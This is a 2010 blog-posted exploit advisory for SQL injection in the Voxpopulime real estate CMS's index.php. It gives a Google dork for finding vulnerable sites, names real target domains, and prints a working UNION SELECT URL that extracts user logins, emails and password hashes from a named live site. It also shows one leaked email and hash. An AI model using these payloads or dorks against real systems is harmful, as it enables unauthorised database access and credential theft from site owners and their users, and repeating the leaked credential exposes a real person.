~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com [~] Reference : http://h4x0resec.blogspot.com [~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Voxpopulime |~Price : N/A |~Version : Real Estate Management System |~Software: http://voxpopulime.com/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google Keyword : "Powered By voxpopulime.com" inurl:index.php?m= |[~]Date : "26.11.2010" |[~]Tested on : (L):Vista (R):Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3 PHP/5.2.13 MYSQL ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://www.asasworld.ae http://www.tpsdubai.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| index.php SQL Injection~~~~~~~~~~~}| http://$Site/$path/index.php?m=developments&act=list&main_id=-138 {SQL Injection} http://$Site/$path/index.php?m=pages&act=pages&pages_id=7 {SQL Injection} http://$Site/$path/index.php?m=developments&act=list&main_id=-1 {SQL Injection} Ex; http://www.asasworld.ae/ [~] SQL Injecting http://www.asasworld.ae/index.php?m=developments&act=list&main_id=-138%20union%20select%201,concat%28user_login,0x3a,user_email,0x3a,password%29,3,4,5,6,7,8,9%20from%20site_users/* [~] MySQL writes : info@asasworld.ae:796ab97a7094304e057acd7c412fcab9 To your continue.. =============================================================
26 Kasım 2010 Cuma
Voxpopulime CMS <= (index.php) SQL Injection Vulnerability
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder